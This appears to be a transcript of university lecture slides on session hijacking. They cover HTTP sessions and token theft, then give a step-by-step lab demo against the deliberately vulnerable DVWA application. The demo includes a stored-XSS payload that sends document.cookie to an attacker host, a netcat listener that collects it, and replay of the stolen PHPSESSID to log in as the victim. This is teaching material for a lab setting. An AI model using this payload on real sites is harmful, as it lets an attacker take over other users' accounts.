Presentation is loading. Please wait.

Presentation is loading. Please wait.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

Similar presentations


Presentation on theme: "NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba."— Presentation transcript:

1 NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba Czech Republic Session Hijacking

2 navy.cs.vsb.cz 2 HTTP protocol The Hypertext Transfer Protocol (HTTP) is an application-level protocol for distributed, collaborative, hypermedia information systems. HTTP has been in use by the World-Wide Web global information initiative since 1990.

3 navy.cs.vsb.cz 3 HTTP protocol RFC 7230 - HTTP/1.1: Message Syntax and Routing RFC 7230 RFC 7231 - HTTP/1.1: Semantics and Content RFC 7231 RFC 7232 - HTTP/1.1: Conditional Requests RFC 7232 RFC 7233 - HTTP/1.1: Range Requests RFC 7233 RFC 7234 - HTTP/1.1: Caching RFC 7234 RFC 7235 - HTTP/1.1: Authentication RFC 7235 (http://trac.tools.ietf.org/)

4 navy.cs.vsb.cz 4 HTTP protocol Client request: GET /hello.txt HTTP/1.1 User-Agent: curl/7.16.3 libcurl/7.16.3 OpenSSL/0.9.7l zlib/1.2.3 Host: www.example.com Accept-Language: en, mi …

5 navy.cs.vsb.cz 5 HTTP protocol Server response: HTTP/1.1 200 OK Date: Mon, 27 Jul 2009 12:28:53 GMT Server: Apache Last-Modified: Wed, 22 Jul 2009 19:15:56 GMT ETag: "34aa387-d-1568eb00" Accept-Ranges: bytes Content-Length: 51 Vary: Accept-Encoding Content-Type: text/plain Hello World! My payload includes a trailing CRLF.

6 navy.cs.vsb.cz 6 Session Is a semi-permanent interactive information interchange, also known as a dialogue, a conversation or a meeting, between two or more communicating devices, or between a computer and user (Login session). A session is set up or established at a certain point in time, and then torn down at some later point. – An established communication session may involve more than one message in each direction. A session is typically, stateful, meaning that at least one of the communicating parts needs to save information about the session history in order to be able to communicate, as opposed to stateless communication, where the communication consists of independent requests with responses.

7 navy.cs.vsb.cz 7 Session An HTTP session is a sequence of network request- response transactions. – An HTTP client initiates a request by establishing a Transmission Control Protocol (TCP) connection to a particular port on a server (typically port 80). – An HTTP server listening on that port waits for a client's request message. – Upon receiving the request, the server sends back a status line, such as "HTTP/1.1 200 OK", and a message of its own. – The body of this message is typically the requested resource, although an error message or other information may also be returned.

8 navy.cs.vsb.cz 8 Session

9 navy.cs.vsb.cz 9 Session HTTP is a stateless protocol. HTTP server require sessions to retain information or status about each user for the duration of multiple requests. Some web applications implement states or server side sessions using for instance HTTP cookies or hidden variables within web forms or encoded parameters in URL

10 navy.cs.vsb.cz 10 Session

11 navy.cs.vsb.cz 11 Session hijacking Session hijacking is when a attacker takes over a session between two systems (machines). The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token. – Because http communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. – The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. – A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the http requisition as a cookie, in other parts of the header of the http request, or yet in the body of the http requisition. The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.

12 navy.cs.vsb.cz 12 Session hijacking The session token could be compromised in different ways; the most common are: – Predictable session token – Session Sniffing – Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc.) – Man-in-the-middle attack

13 navy.cs.vsb.cz 13 Session hijacking - Session Sniffing

14 navy.cs.vsb.cz 14 Session hijacking– Man in the middle

15 navy.cs.vsb.cz 15 Session hijacking – XSS (Cross Site Scripting)

16 navy.cs.vsb.cz 16 Session hijacking – XSS (Cross Site Scripting) IMG SRC SCRIPT SRC IFRAME SRC JavaScript Image Object var img = new Image(); img.src = "http://host/?command"; 'XMLHTTP' Object in IE var post_data = 'name=value'; var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); xmlhttp.open("POST", 'http://url/path/file.ext', true); xmlhttp.onreadystatechange = function () { if (xmlhttp.readyState == 4) { alert(xmlhttp.responseText); } }; xmlhttp.send(post_data); 'XMLHTTP' Object in Mozilla var post_data = 'name=value'; var xmlhttp=new XMLHttpRequest(); xmlhttp.open("POST", 'http://url/path/file.ext', true); xmlhttp.onreadystatechange = function () { if (xmlhttp.readyState == 4) { alert(xmlhttp.responseText); } }; xmlhttp.send(post_data);

17 navy.cs.vsb.cz 17 Demo - Tools Hosted web application (DVWA) Basic knowledge of JavaScript Custom application able to handle HTTP request (i.e. Netcat - http://www.linuxcommand.org/man_pages/n c1.html)

18 navy.cs.vsb.cz 18 Demo 1.Attacker logs into target web application as a common user. http://127.0.0.1/dvwa/login.php User name: smithy Password: password 2.Try XSS vulnerability of text input. Type in: < alert('XSS!'); alert(document.cookie);

19 navy.cs.vsb.cz 19 Demo

20 navy.cs.vsb.cz 20 Demo Attacker logs in into Kali Linux Username: root Password: toor Determine your attacker’s IP address root@kali:~# ifconfig eth0

21 navy.cs.vsb.cz 21 Demo Use Netcat utility to listen incoming HTTP requests (TCP port 80) root@kali:~# netcat -lvp 80 -l … listen mode, for inbound connects -v … verbose [use twice to be more verbose] -p port... local port number

22 navy.cs.vsb.cz 22 Demo In DVWA navigate to XSS Stored (Guest Book) section – This section represents guest book. Records are stored in DB. Add new record with your malicious script which will hijack victim’s session ID – HOST is your attacker’s PC IP address

23 navy.cs.vsb.cz 23 Demo var img = new Image(); img.src = "http://HOST/MyNetcatServiceListener?cookie="+document. cookie;

24 navy.cs.vsb.cz 24 Demo Now whoever visits the GuestBook will execute your XSS code and send cookie with SESSIONID to your attacker's PC

25 navy.cs.vsb.cz 25 Demo Use the hijacked Cookie to bypass the authentication. In your attacker’s PC open browser and navigate to DVWA web page.

26 navy.cs.vsb.cz 26 Demo Open Tamper Data plugin and start Tamper. Fill in non existing user name and password to get your own session. In Tamper Data plugin edit PHPSESSID value to the value you have received from hijacked Cookie

27 navy.cs.vsb.cz 27 Demo

28 navy.cs.vsb.cz 28 Demo You will get Authentication failed message (you entered non existing credentials)

29 navy.cs.vsb.cz 29 Demo Now navigate back to the root of the web page and you should be logged in under your victim’s account. Done!

30 navy.cs.vsb.cz 30 References DVWA - http://www.dvwa.co.uk/http://www.dvwa.co.uk/ Netcat tool - http://netcat.sourceforge.net/http://netcat.sourceforge.net/ CSRF - http://www.cgisecurity.com/csrf-faq.htmlhttp://www.cgisecurity.com/csrf-faq.html https://www.owasp.org/index.php/XSS_Filter_Ev asion_Cheat_Sheet HACKING EXPOSED (ISBN: 978-0-07-161375-0) Penetration testing (ISBN-10: 1-59327-564-1) Principles of Computer Security (ISBN: 978-0-07- 174857-5)

31 navy.cs.vsb.cz 31 Warning Hacking is illegal because it is getting into a system another person owns. If you wanted to do legal hacking then you would have to own the system.


Download ppt "NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba."

Similar presentations


Ads by Google